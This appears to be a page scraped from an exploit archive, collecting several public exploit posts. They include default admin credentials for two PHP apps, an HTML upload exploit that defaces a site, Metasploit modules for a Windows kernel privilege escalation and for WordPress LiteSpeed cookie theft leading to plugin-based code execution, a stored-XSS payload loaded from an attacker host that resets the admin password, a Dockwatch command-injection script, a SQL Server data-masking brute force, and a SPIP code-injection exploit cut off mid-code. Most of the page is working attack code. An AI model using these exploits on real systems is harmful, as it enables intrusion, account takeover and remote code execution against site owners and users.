<pre><code>====================================================================================================================================<br />| # Title : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: murja<br /> <br /> Password: 123<br /><br />[+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/bpmsp/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Traffic Offense 1.0 Auth by Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip |<br />=============================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.<br /><br />[+] Line 33 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Direct File Upload</title><br /></head><br /><body><br /><br /> <h2>Direct File Upload</h2><br /> <form id="uploadForm"><br /> <label for="fileInput">Select File:</label><br /> <input type="file" id="fileInput" name="fileInput" required><br><br><br /><br /> <button type="button" onclick="uploadFile()">Upload File</button><br /> </form><br /><br /> <script><br /> function uploadFile() {<br /> const fileInput = document.getElementById('fileInput').files[0];<br /><br /> if (!fileInput) {<br /> alert('Please select a file.');<br /> return;<br /> }<br /><br /> const formData = new FormData();<br /> formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');<br /> formData.append('img', fileInput);<br /><br /> console.log("(+) Uploading file...");<br /><br /> fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL<br /> method: 'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> if (data === '1') {<br /> console.log("(+) File upload seems to have been successful!");<br /> } else {<br /> console.log("(-) Oh no, the file upload seems to have failed!");<br /> }<br /> })<br /> .catch(error => console.error("(-) Error during file upload:", error));<br /> }<br /> </script><br /><br /></body><br /></html><br /><br /> <br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Local::WindowsKernel<br /> include Msf::Post::File<br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> include Msf::Post::Windows::Version<br /> include Msf::Exploit::Retry<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes',<br /> 'Description' => %q{<br /> CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,<br /> Windows 11 and Windows Server 2022.<br /><br /> The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when<br /> the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the<br /> kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure<br /> directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and<br /> `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading<br /> to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.<br /> },<br /> 'Author' => [<br /> 'tykawaii98', # PoC (Bùi Quang Hiếu)<br /> 'jheysel-r7' # msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/tykawaii98/CVE-2024-30088'],<br /> [ 'CVE', '2024-30038']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Privileged' => true,<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Targets' => [<br /> [ 'Windows x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'DisclosureDate' => '2024-06-11',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, ],<br /> 'Reliability' => [UNRELIABLE_SESSION] # It should return a session on the first run although has the potential to fail.<br /> }, # After the first run the original session will usually die if the module is rerun against the same session.<br /> 'Compat' => {<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_sys_process_get_processes<br /> stdapi_railgun_api<br /> stdapi_sys_process_memory_allocate<br /> stdapi_sys_process_memory_protect<br /> stdapi_sys_process_memory_read<br /> stdapi_sys_process_memory_write<br /> ]<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def target_compatible?(version)<br /> # NOTE: Win10_1607 = Server2016 and Win10_1809 = Server2019. Both Server and Desktop version are supposed to be affected.<br /> return true if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Rex::Version.new('10.0.10240.20680')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_1607, Rex::Version.new('10.0.14393.7070')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_1809, Rex::Version.new('10.0.17763.5936')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_21H2, Rex::Version.new('10.0.19044.4529')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win10_22H2, Rex::Version.new('10.0.19045.4529')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win11_21H2, Rex::Version.new('10.0.22000.3019')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win11_22H2, Rex::Version.new('10.0.22621.3737')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Win11_23H2, Rex::Version.new('10.0.22631.3737')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Server2022, Rex::Version.new('10.0.20348.2522')) ||<br /> version.build_number.between?(Msf::WindowsVersion::Server2022_23H2, Rex::Version.new('10.0.25398.950'))<br /><br /> false<br /> end<br /><br /> def check<br /> return Exploit::CheckCode::Safe('Non Windows systems are not affected') unless session.platform == 'windows'<br /><br /> version = get_version_info<br /> return Exploit::CheckCode::Appears("Version detected: #{version}") if target_compatible?(version)<br /><br /> CheckCode::Safe("Version detected: #{version}")<br /> end<br /><br /> def get_winlogon_pid<br /> processes = client.sys.process.get_processes<br /> winlogon_pid = nil<br /> processes.each do |process|<br /> if process['name'].downcase == 'winlogon.exe'<br /> winlogon_pid = process['pid']<br /> break<br /> end<br /> end<br /><br /> winlogon_pid<br /> end<br /><br /> def get_winlogon_handle<br /> pid = session.sys.process.getpid<br /> process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)<br /> address = process_handle.memory.allocate(8)<br /><br /> thread = execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'),<br /> address,<br /> pid<br /> )<br /><br /> calls = [<br /> ['kernel32', 'WaitForSingleObject', [ thread.handle, 20000 ] ],<br /> ['kernel32', 'GetExitCodeThread', [ thread.handle, 4 ] ],<br /> ]<br /><br /> results = session.railgun.multi(calls)<br /> winlogon_handle = nil<br /><br /> if results.last['lpExitCode'] == 0<br /> print_good('The exploit was successful, reading SYSTEM token from memory...')<br /> current_memory = process_handle.memory.read(address, 8)<br /> winlogon_handle = current_memory.unpack('Q<').first<br /> end<br /><br /> session.railgun.kernel32.VirtualFree(address, 0, MEM_RELEASE)<br /> winlogon_handle<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br /><br /> version = get_version_info<br /> unless target_compatible?(version)<br /> fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}")<br /> end<br /><br /> winlogon_handle = get_winlogon_handle<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon handle') unless winlogon_handle<br /> print_good("Successfully stole winlogon handle: #{winlogon_handle}")<br /><br /> winlogon_pid = get_winlogon_pid<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon pid') unless winlogon_pid<br /> print_good("Successfully retrieved winlogon pid: #{winlogon_pid}")<br /><br /> host = session.sys.process.new(winlogon_pid, winlogon_handle)<br /> shellcode = payload.encoded<br /> shell_addr = host.memory.allocate(shellcode.length)<br /> host.memory.protect(shell_addr)<br /><br /> if host.memory.write(shell_addr, shellcode) < shellcode.length<br /> fail_with(Failure::UnexpectedReply, 'Failed to write shellcode')<br /> end<br /><br /> vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{winlogon_pid})")<br /> thread = host.thread.create(shell_addr, 0)<br /> unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)<br /> fail_with(Failure::UnexpectedReply, 'Unable to create thread')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class DebugLogError < StandardError; end<br /> class WordPressNotOnline < StandardError; end<br /> class AdminCookieError < StandardError; end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin<br /> that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when<br /> the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint<br /> which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.<br /> The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.<br /> },<br /> 'Author' => [<br /> 'Rafie Muhammad', # discovery<br /> 'jheysel-r7' # module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],<br /> [ 'CVE', '2024-44000']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Privileged' => false,<br /> 'Platform' => ['unix', 'linux', 'win', 'php'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows In-Memory',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2024-09-04',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> @admin_cookie = get_valid_admin_cookie<br /> CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')<br /> rescue WordPressNotOnline => e<br /> return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")<br /> rescue DebugLogError => e<br /> return CheckCode::Safe("#{e.class}, #{e}")<br /> rescue AdminCookieError => e<br /> return CheckCode::Safe("#{e.class}, #{e}")<br /> end<br /><br /> def extract_cookies(debug_log)<br /> admin_cookies = []<br /> debug_log.each_line do |log_line|<br /> # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c<br /> match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)<br /> admin_cookies << match.captures.compact.join('; ') if match<br /> end<br /> admin_cookies<br /> end<br /><br /> def verify_admin_cookie(admin_cookies)<br /> admin_cookies.each do |admin_cookie|<br /> res = send_request_cgi({<br /> 'uri' => '/wp-admin/',<br /> 'cookie' => admin_cookie<br /> })<br /> return admin_cookie if res&.code == 200<br /> end<br /><br /> nil<br /> end<br /><br /> def get_valid_admin_cookie<br /> raise WordPressNotOnline unless wordpress_and_online?<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri('wp-content', 'debug.log'),<br /> 'method' => 'GET'<br /> })<br /> raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200<br /> raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')<br /><br /> admin_cookies = extract_cookies(res.body)<br /> raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?<br /><br /> print_status('One or more potential admin cookies were found')<br /><br /> admin_cookie = verify_admin_cookie(admin_cookies)<br /> raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie<br /><br /> admin_cookie<br /> end<br /><br /> def exploit<br /> unless @admin_cookie<br /> begin<br /> @admin_cookie = get_valid_admin_cookie<br /> print_good('Found and tested valid admin cookie, we can upload and execute a payload')<br /> rescue WordPressNotOnline => e<br /> fail_with(Failure::NotFound, "#{e.class}, #{e}")<br /> rescue DebugLogError, AdminCookieError => e<br /> fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")<br /> end<br /> end<br /><br /> print_status('Preparing payload...')<br /> plugin_name = Rex::Text.rand_text_alpha(10)<br /> payload_name = Rex::Text.rand_text_alpha(10).to_s<br /> payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")<br /> zip = generate_plugin(plugin_name, payload_name)<br /><br /> print_status('Uploading payload...')<br /><br /> uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded<br /><br /> print_status("Executing the payload at #{payload_uri}...")<br /> register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")<br /> register_dir_for_cleanup("../#{plugin_name}")<br /> send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Stored XSS to Account Takeover - htmlyv2.9.9<br /># Date: 9/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 2.9.9<br /># Tested on: Ubuntu 22.04<br /># Blog:<br />https://msecureltd.blogspot.com/2024/08/friday-fun-pentest-series-9-stored-xss.html<br /><br /><br />Description:<br /><br />- It was found that the application suffers from stored XSS<br /><br />- Low level user having an "author" role can takeover admin account and<br />change their password via posting a malicious post with a reference to a<br />payload hosted on attacker domain<br /><br /><br /><br />Stored XSS to Account Takeover #1:<br /><br />Steps to Reproduce:<br /><br />1. Visit "My Posts" > "Add New Post" > "Regular Post"<br />2. Enter the following payload into the "Content" referencing externally<br />hosted POC in Javascript:<br /> <script src="http://192.168.159.191:8000/xss.js"></script><br />3. Upon visiting the blog post, the admin account password would be changed<br />to "test"<br />4. In the XSS payload pasted below need to adjust the "passwordChangeUrl",<br />"username" and "password"<br /><br /><br />// Javascript POC<br /><br />// Function to fetch CSRF token and perform password change<br /> (function() {<br /> // URL of the password change page<br /> const passwordChangePageUrl = '<br />http://192.168.159.191/htmly/edit/password';<br /><br /> // Function to fetch the CSRF token<br /> function fetchCsrfToken() {<br /> fetch(passwordChangePageUrl, {<br /> method: 'GET',<br /> credentials: 'include' // Include cookies for the current<br />session<br /> })<br /> .then(response => response.text())<br /> .then(html => {<br /> // Parse the HTML to find the CSRF token<br /> const parser = new DOMParser();<br /> const doc = parser.parseFromString(html, 'text/html');<br /> const csrfTokenInput =<br />doc.querySelector('input[name="csrf_token"]');<br /> if (csrfTokenInput) {<br /> const csrfToken = csrfTokenInput.value;<br /> console.log('CSRF Token:', csrfToken);<br /> changePassword(csrfToken);<br /> } else {<br /> console.error('CSRF token not found');<br /> }<br /> })<br /> .catch(error => console.error('Error fetching CSRF token:',<br />error));<br /> }<br /><br /> // Function to change the password<br /> function changePassword(csrfToken) {<br /> const postData = new URLSearchParams();<br /> postData.append('csrf_token', csrfToken);<br /> postData.append('username', 'admin');<br /> postData.append('password', 'test');<br /><br /> fetch(passwordChangePageUrl, {<br /> method: 'POST',<br /> body: postData,<br /> headers: {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> credentials: 'include' // Include cookies for the current<br />session<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> console.log('Password change response:', data);<br /> })<br /> .catch(error => console.error('Error changing password:',<br />error));<br /> }<br /><br /> // Trigger the CSRF token fetch and password change<br /> fetchCsrfToken();<br /> })();<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># -*- coding: UTF-8 -*-<br />#<br /># dockexec.py<br />#<br /># Dockwatch Remote Command Execution<br />#<br /># Jeremy Brown [jbrown3264/gmail] / Sept 2024<br />#<br /># Intro<br />#<br /># Dockwatch is a container management web UI for docker. It runs by default<br /># without authentication, although guidance is available for how to setup<br /># credentials for access. It has a Commands feature that allows a user to<br /># run docker commands such as inspect, network, ps. Prior to fix, it did not<br /># restrict input for parameters, so both 'container' and 'parameters' for the<br /># 'dockerInspect' command were vulnerable to shell command injection on the<br /># container as the 'abc'user with (limited) command output.<br />#<br /># Example<br />#<br /># $ ./dockexec.py http://host:9999 "id"<br /># uid=1001(abc)<br /># gid=131(abc)<br /># groups=131(abc),281(unraiddocker),1000(users)<br />#<br /># Workaround: echo "admin:[a-FANTASTIC-password]" > /config/logins<br /># * DO NOT DO THIS: echo "" > /config/logins (* unless you want spacebar to work for user/pass)<br />#<br /># Fix: see commits 23df366 and c091e4c, kudos for maintainers for quick fixes<br />#<br /><br />import sys<br />import requests<br />import re<br /><br />def clean_output(output):<br /> output = output.replace('[]', '')<br /> output = re.sub(r'Error: No such object:\s*', '', output)<br /> output = output.replace('command', '')<br /> output = output.replace('test\n', '')<br /> lines = [line.strip() for line in output.split('\n')]<br /> return '\n'.join(lines)<br /><br />def send_command(url, command):<br /> endpoint = f"{url}/ajax/commands.php"<br /><br /> data = {<br /> 'm': 'runCommand',<br /> 'command': 'dockerInspect',<br /> 'container': command,<br /> 'parameters': 'test', # also affected<br /> 'servers': '0'<br /> }<br /><br /> try:<br /> response = requests.post(endpoint, data=data)<br /> response.raise_for_status()<br /><br /> match = re.search(r'<pre[^>]*>(.*?)</pre>', response.text, re.DOTALL)<br /> if match:<br /> output = clean_output(match.group(1))<br /> if output:<br /> print("%s" % output)<br /> else:<br /> print("No output found.")<br /> else:<br /> print("No output found in the response.")<br /> except requests.exceptions.RequestException as error:<br /> print("An error occurred: %s" % error)<br /><br />if __name__ == "__main__":<br /> if len(sys.argv) != 3:<br /> print("Usage: %s <url> <command>" % sys.argv[0])<br /> sys.exit(1)<br /><br /> url = sys.argv[1]<br /> command = "`" + sys.argv[2] + "`"<br /><br /> send_command(url, command)<br /></code></pre>
<pre><code>Title: SQL Server Masked Data Exposure Through Brute Force Attack<br />Product: Database<br />Manufacturer: Microsoft<br />Affected Version(s): SQL Server 2014, 2016,2017,2019,2022<br />Tested Version(s): SQL Server 2014, 2016,2017,2019,2022<br />Risk Level: Low<br />Security Feature: Dynamic Data Masking<br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details And Back Ground:<br /><br />Microsoft SQL Server database system has a security feature called "dynamic data masking" , this feature is designed to redact/mask column level values (columns containing sensitive data ….for example credit card number…etc).<br /><br />The feature is good but has many security weaknesses that organizations/companies should be aware of. Among them is brute force technique against the “where” conditional clause to retrieve actual data values (numeric values).<br /><br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />I will create database called demodb and create table called dbo.COMPANY and insert dummy data in it:<br /><br />create database demodb;<br /><br />USE [demodb]<br /><br />GO<br /><br />SET ANSI_NULLS ON<br /><br />GO<br /><br />SET QUOTED_IDENTIFIER ON<br /><br />GO<br /><br />CREATE TABLE [dbo].[COMPANY](<br /><br />[COMPANY_NAME] [nvarchar](max) NULL,<br /><br />[SALES] [int] NULL<br /><br />) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]<br /><br />GO<br /><br />USE [demodb]<br /><br />GO<br /><br />INSERT INTO [dbo].[COMPANY]<br /><br /> ([COMPANY_NAME]<br /><br /> ,[SALES])<br /><br /> VALUES<br /><br /> ('COMPANY_C','93')<br /><br />GO<br /><br />USE [demodb]<br /><br />GO<br /><br />INSERT INTO [dbo].[COMPANY]<br /><br /> ([COMPANY_NAME]<br /><br /> ,[SALES])<br /><br /> VALUES<br /><br /> ('COMPANY_A','11')<br /><br />GO<br /><br /><br />USE [demodb]<br /><br />GO<br /><br />INSERT INTO [dbo].[COMPANY]<br /><br /> ([COMPANY_NAME]<br /><br /> ,[SALES])<br /><br /> VALUES<br /><br /> ('COMPANY_B','78')<br /><br />GO<br /><br />------ I will enable dynamic data masking function against SALES column:<br /><br /> ALTER TABLE dbo.COMPANY<br /><br />ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()');<br /><br />------ Then, will create a user called reg_user that can only query the table, so the user will only see SALES column with complete masked data [ZERO values]:<br /><br />USE [demodb]<br /><br />GO<br /><br />CREATE USER reg_user WITHOUT LOGIN;<br /><br />GRANT SELECT ON dbo.COMPANY to reg_user;<br /><br />EXECUTE AS USER = 'reg_user';<br /><br />SELECT * FROM dbo.COMPANY;<br /><br />REVERT;<br /><br /><br /><br />------ However, using the same non-privileged database account reg_user …I will be able to extract Actual Values :<br /><br /><br />EXECUTE AS USER = 'reg_user';<br /><br /> DECLARE @sales_txt nvarchar(max);<br /><br /> DECLARE @LCounter INT= 1;<br /><br /> WHILE (@LCounter < 99)<br /><br /> BEGIN<br /><br />SET @sales_txt=(SELECT COMPANY_NAME+' sales is ' +CAST (@LCounter as nvarchar)<br /><br /> FROM dbo.COMPANY<br /><br /> WHERE SALES=@LCounter)<br /><br /> print @sales_txt<br /><br /> SET @LCounter = @LCounter + 1<br /><br /> END<br /><br />REVERT;<br /><br /><br />Output:<br /><br />COMPANY_A sales is 11<br /><br />COMPANY_B sales is 78<br /><br />COMPANY_C sales is 93<br /><br /><br /><br />------ Actual values were successfully extracted from the masked column !<br /><br /><br />*****************************************<br /><br />Protection Mechanisms:<br /><br />1. Ensure network firewall rules are in-place to ensure database accounts can be connected to the destination database server host from specific list of source hosts. This will add good<br />security protection layer especially if database account credentials were exposed.<br /><br />2. Implement Security Auditing against identified sensitive tables.<br /><br />3. Implement other security features along dynamic data masking such as encryption. of course Always Encrypted feature is the best in terms of data protection.<br /><br /><br />*****************************************<br />References:<br />https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16<br />https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/<br />https://www.youtube.com/watch?v=NiAg0sGsGtw<br /><br /><br /><br /><br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP BigUp 4.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.<br /> The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. <br /> By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. <br /> It allows unauthenticated users to execute arbitrary code remotely via the public interface. <br /><br /><br />[+] Line 143 : Set your target & payload .<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br />class indoushka {<br /> private $targetUri;<br /> private $formPage;<br /> private $payload;<br /><br /> public function __construct($targetUri, $formPage = 'auto', $payload) {<br /> $this->targetUri = $targetUri;<br /> $this->formPage = $formPage;<br /> $this->payload = $payload;<br /> }<br /><br /> public function check() {<br /> $spipVersion = $this->getSpipVersion();<br /> if (!$spipVersion) {<br /> return "Unable to determine the version of SPIP.";<br /> }<br /> echo "SPIP Version detected: " . $spipVersion . "\n";<br /><br /> $vulnerableRanges = [<br /> ['start' => '4.0.0', 'end' => '4.1.17'],<br /> ['start' => '4.2.0', 'end' => '4.2.15'],<br /> ['start' => '4.3.0', 'end' => '4.3.1']<br /> ];<br /><br /> $isVulnerable = false;<br /> foreach ($vulnerableRanges as $range) {<br /> if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {<br /> $isVulnerable = true;<br /> break;<br /> }<br /> }<br /><br /> if (!$isVulnerable) {<br /> return "The detected SPIP version ($spipVersion) is not vulnerable.";<br /> }<br /><br /> echo "SPIP version $spipVersion is vulnerable.\n";<br /> return "SPIP version $spipVersion is vulnerable.";<br /> }<br /><br /> private function getSpipVersion() {<br /> // This function should make an HTTP request to detect the SPIP version<br /> // Return the version or false if undetectable<br /> return '4.3.1'; // Example version, replace with actual logic<br /> }<br /><br /> private function getFormData() {<br /> $pages = ['login', 'spip_pass', 'contact'];<br /><br /> if ($this->formPage !== 'auto') {<br /> $pages = [$this->formPage];<br /> }<br /><br /> foreach ($pages as $page) {<br /> $url = $this->normalizeUri($page);<br /> $response = $this->sendRequest('GET', $url);<br /><br /> if ($response['status'] === 200) {<br /> libxml_use_internal_errors(true); // Prevent warnings from invalid HTML<br /> $doc = new DOMDocument();<br /> @$doc->loadHTML($response['body']);<br /> libxml_clear_errors();<br /><br /> $inputs = $doc->getElementsByTagName('input');<br /> if ($inputs->length > 1) {<br /> $action = $inputs->item(0)->getAttribute('value');<br /> $args = $inputs->item(1)->getAttribute('value');<br /> <br /> if ($action && $args) {<br /> echo "Found formulaire_action: $action\n";<br /> echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";<br /> return ['action' => $action, 'args' => $args];<br /> }<br /> }<br /> }<br /> }<br /><br /> return null;<br /> }<br /><br /> private function normalizeUri($page) {<br /> return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');<br /> }<br /><br /> private function sendRequest($method, $url, $data = null) {<br /> $ch = curl_init();<br /><br /> curl_setopt($ch, CURLOPT_URL, $url);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> if ($method === 'POST' && $data) {<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)<br /> ]);<br /> }<br /><br /> $response = curl_exec($ch);<br /> $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);<br /><br /> curl_close($ch);<br /><br /> return ['status' => $httpCode, 'body' => $response];<br /> }<br /><br /> private function encodePayload() {<br /> return base64_encode($this->payload);<br /> }<br /><br /> public function exploit() {<br /> $formData = $this->getFormData();<br /> if (!$formData) {<br /> echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";<br /> return;<br /> }<br /><br /> echo "Preparing to send exploit payload to the target...\n";<br /><br /> $encodedPayload = $this->encodePayload();<br /> $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br 